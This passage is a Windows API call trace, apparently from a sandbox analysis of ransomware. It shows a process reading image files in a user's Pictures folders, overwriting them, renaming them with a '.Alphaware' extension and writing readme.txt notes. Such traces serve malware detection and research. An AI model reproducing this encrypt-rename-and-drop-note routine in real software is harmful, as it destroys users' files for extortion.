lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\WsNjcAtuTT8n1nv.gif", nBufferLength=0x105, lpBuffer=0x23e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\WsNjcAtuTT8n1nv.gif", lpFilePart=0x0) returned 0x4d [0086.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0086.572] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\WsNjcAtuTT8n1nv.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqr9nqmjn0 i\\wsnjcatutt8n1nv.gif"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70196930, ftCreationTime.dwHighDateTime=0x1d9676d, ftLastAccessTime.dwLowDateTime=0x4f1b01a0, ftLastAccessTime.dwHighDateTime=0x1d96e96, ftLastWriteTime.dwLowDateTime=0x85ccef20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2434)) returned 1 [0086.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0086.572] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\WsNjcAtuTT8n1nv.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqr9nqmjn0 i\\wsnjcatutt8n1nv.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\WsNjcAtuTT8n1nv.gif.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqr9nqmjn0 i\\wsnjcatutt8n1nv.gif.alphaware")) returned 1 [0086.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0086.574] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfed4280, ftCreationTime.dwHighDateTime=0x1d96df6, ftLastAccessTime.dwLowDateTime=0x85ccef20, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85ccef20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.574] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51bdcf20, ftCreationTime.dwHighDateTime=0x1d96787, ftLastAccessTime.dwLowDateTime=0xd4ceaf70, ftLastAccessTime.dwHighDateTime=0x1d96ddf, ftLastWriteTime.dwLowDateTime=0x85b9e420, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x151b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="H-iXHNw3Q.jpg.Alphaware", cAlternateFileName="H-IXHN~1.ALP")) returned 1 [0086.574] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85b9e420, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x85b9e420, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85bc4580, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0086.574] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70196930, ftCreationTime.dwHighDateTime=0x1d9676d, ftLastAccessTime.dwLowDateTime=0x4f1b01a0, ftLastAccessTime.dwHighDateTime=0x1d96e96, ftLastWriteTime.dwLowDateTime=0x85ccef20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2434, dwReserved0=0x0, dwReserved1=0x0, cFileName="WsNjcAtuTT8n1nv.gif.Alphaware", cAlternateFileName="WSNJCA~1.ALP")) returned 1 [0086.574] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70196930, ftCreationTime.dwHighDateTime=0x1d9676d, ftLastAccessTime.dwLowDateTime=0x4f1b01a0, ftLastAccessTime.dwHighDateTime=0x1d96e96, ftLastWriteTime.dwLowDateTime=0x85ccef20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2434, dwReserved0=0x0, dwReserved1=0x0, cFileName="WsNjcAtuTT8n1nv.gif.Alphaware", cAlternateFileName="WSNJCA~1.ALP")) returned 0 [0086.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0086.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0086.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0086.574] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53081a00, ftCreationTime.dwHighDateTime=0x1d96635, ftLastAccessTime.dwLowDateTime=0xcac76500, ftLastAccessTime.dwHighDateTime=0x1d96775, ftLastWriteTime.dwLowDateTime=0xcac76500, ftLastWriteTime.dwHighDateTime=0x1d96775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.575] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32f6a60, ftCreationTime.dwHighDateTime=0x1d97153, ftLastAccessTime.dwLowDateTime=0x1f004e40, ftLastAccessTime.dwHighDateTime=0x1d97372, ftLastWriteTime.dwLowDateTime=0x1f004e40, ftLastWriteTime.dwHighDateTime=0x1d97372, nFileSizeHigh=0x0, nFileSizeLow=0x1442c, dwReserved0=0x0, dwReserved1=0x0, cFileName="YYaadTzVoXXESXd.bmp", cAlternateFileName="YYAADT~1.BMP")) returned 1 [0086.575] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0086.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0086.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0086.575] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\oOpoFnm9s\\YYaadTzVoXXESXd.bmp", dwFileAttributes=0x80) returned 1 [0086.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0086.575] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\oOpoFnm9s\\YYaadTzVoXXESXd.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\oopofnm9s\\yyaadtzvoxxesxd.bmp"), fInfoLevelId=0x0, lpFileInformation=0x2551cc8 | out: lpFileInformation=0x2551cc8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe32f6a60, ftCreationTime.dwHighDateTime=0x1d97153, ftLastAccessTime.dwLowDateTime=0x1f004e40, ftLastAccessTime.dwHighDateTime=0x1d97372, ftLastWriteTime.dwLowDateTime=0x1f004e40, ftLastWriteTime.dwHighDateTime=0x1d97372, nFileSizeHigh=0x0, nFileSizeLow=0x1442c)) returned 1 [0086.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0086.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0086.575] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\oOpoFnm9s\\YYaadTzVoXXESXd.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\oopofnm9s\\yyaadtzvoxxesxd.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0086.576] ReadFile (in: hFile=0x254, lpBuffer=0x2551f90, nNumberOfBytesToRead=0x1442c, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2551f90*, lpNumberOfBytesRead=0x23e958*=0x1442c, lpOverlapped=0x0) returned 1 [0086.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0086.636] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\oOpoFnm9s\\YYaadTzVoXXESXd.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\oopofnm9s\\yyaadtzvoxxesxd.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.637] GetFileType (hFile=0x254) returned 0x1 [0086.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0086.637] GetFileType (hFile=0x254) returned 0x1 [0086.638] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.639] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.639] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.639] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.640] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.640] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.640] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.640] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.641] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.641] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.641] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.641] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.642] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.642] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.642] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.642] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.643] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.643] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.643] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.643] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.644] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.644] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.644] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.644] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.645] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.651] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.651] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e838, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e838*=0x1000, lpOverlapped=0x0) returned 1 [0086.651] WriteFile (in: hFile=0x254, lpBuffer=0x2443770*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x2443770*, lpNumberOfBytesWritten=0x23e818*=0x108, lpOverlapped=0x0) returned 1 [0086.652] CloseHandle (hObject=0x254) returned 1 [0086.654] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\oOpoFnm9s\\YYaadTzVoXXESXd.bmp.Alphaware", nBufferLength=0x105, lpBuffer=0x23e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\oOpoFnm9s\\YYaadTzVoXXESXd.bmp.Alphaware", lpFilePart=0x0) returned 0x54 [0086.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0086.654] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\oOpoFnm9s\\YYaadTzVoXXESXd.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\oopofnm9s\\yyaadtzvoxxesxd.bmp"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32f6a60, ftCreationTime.dwHighDateTime=0x1d97153, ftLastAccessTime.dwLowDateTime=0x1f004e40, ftLastAccessTime.dwHighDateTime=0x1d97372, ftLastWriteTime.dwLowDateTime=0x85d8d600, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b108)) returned 1 [0086.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0086.654] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\oOpoFnm9s\\YYaadTzVoXXESXd.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\oopofnm9s\\yyaadtzvoxxesxd.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\oOpoFnm9s\\YYaadTzVoXXESXd.bmp.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\oopofnm9s\\yyaadtzvoxxesxd.bmp.alphaware")) returned 1 [0086.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e868) returned 1 [0086.655] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\oOpoFnm9s\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\oopofnm9s\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.656] GetFileType (hFile=0x254) returned 0x1 [0086.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7d8) returned 1 [0086.656] GetFileType (hFile=0x254) returned 0x1 [0086.657] WriteFile (in: hFile=0x254, lpBuffer=0x2446cb0*, nNumberOfBytesToWrite=0x49d, lpNumberOfBytesWritten=0x23e908, lpOverlapped=0x0 | out: lpBuffer=0x2446cb0*, lpNumberOfBytesWritten=0x23e908*=0x49d, lpOverlapped=0x0) returned 1 [0086.658] CloseHandle (hObject=0x254) returned 1 [0086.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0086.658] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\oOpoFnm9s", nBufferLength=0x105, lpBuffer=0x23e500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\oOpoFnm9s", lpFilePart=0x0) returned 0x36 [0086.659] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\oOpoFnm9s\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\oopofnm9s\\*"), lpFindFileData=0x23e800 | out: lpFindFileData=0x23e800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53081a00, ftCreationTime.dwHighDateTime=0x1d96635, ftLastAccessTime.dwLowDateTime=0x85d8d600, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85d8d600, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a1f0 [0086.659] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53081a00, ftCreationTime.dwHighDateTime=0x1d96635, ftLastAccessTime.dwLowDateTime=0x85d8d600, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85d8d600, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.659] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85d8d600, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x85d8d600, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85d8d600, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0086.659] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32f6a60, ftCreationTime.dwHighDateTime=0x1d97153, ftLastAccessTime.dwLowDateTime=0x1f004e40, ftLastAccessTime.dwHighDateTime=0x1d97372, ftLastWriteTime.dwLowDateTime=0x85d8d600, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b108, dwReserved0=0x0, dwReserved1=0x0, cFileName="YYaadTzVoXXESXd.bmp.Alphaware", cAlternateFileName="YYAADT~1.ALP")) returned 1 [0086.659] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32f6a60, ftCreationTime.dwHighDateTime=0x1d97153, ftLastAccessTime.dwLowDateTime=0x1f004e40, ftLastAccessTime.dwHighDateTime=0x1d97372, ftLastWriteTime.dwLowDateTime=0x85d8d600, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b108, dwReserved0=0x0, dwReserved1=0x0, cFileName="YYaadTzVoXXESXd.bmp.Alphaware", cAlternateFileName="YYAADT~1.ALP")) returned 0 [0086.659] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0086.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0086.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0086.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0086.659] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6", nBufferLength=0x105, lpBuffer=0x23e640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6", lpFilePart=0x0) returned 0x2e [0086.660] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\w0y6K3cxjraf-y2uE6\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\w0y6k3cxjraf-y2ue6\\*"), lpFindFileData=0x23e940 | out: lpFindFileData=0x23e940*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb139e870, ftCreationTime.dwHighDateTime=0x1d9718d, ftLastAccessTime.dwLowDateTime=0x5f3e4290, ftLastAccessTime.dwHighDateTime=0x1d974c7, ftLastWriteTime.dwLowDateTime=0x5f3e4290, ftLastWriteTime.dwHighDateTime=0x1d974c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a1f0 [0086.660] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb139e870, ftCreationTime.dwHighDateTime=0x1d9718d, ftLastAccessTime.dwLowDateTime=0x5f3e4290, ftLastAccessTime.dwHighDateTime=0x1d974c7, ftLastWriteTime.dwLowDateTime=0x5f3e4290, ftLastWriteTime.dwHighDateTime=0x1d974c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.660] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c5dc2b0, ftCreationTime.dwHighDateTime=0x1d96c3a, ftLastAccessTime.dwLowDateTime=0xed5d2390, ftLastAccessTime.dwHighDateTime=0x1d96e30, ftLastWriteTime.dwLowDateTime=0xed5d2390, ftLastWriteTime.dwHighDateTime=0x1d96e30, nFileSizeHigh=0x0, nFileSizeLow=0x16e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="5K5LME1qn8ON6owMG2.gif", cAlternateFileName="5K5LME~1.GIF")) returned 1 [0086.660] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3310ce60, ftCreationTime.dwHighDateTime=0x1d9681d, ftLastAccessTime.dwLowDateTime=0xe7969510, ftLastAccessTime.dwHighDateTime=0x1d96a00, ftLastWriteTime.dwLowDateTime=0xe7969510, ftLastWriteTime.dwHighDateTime=0x1d96a00, nFileSizeHigh=0x0, 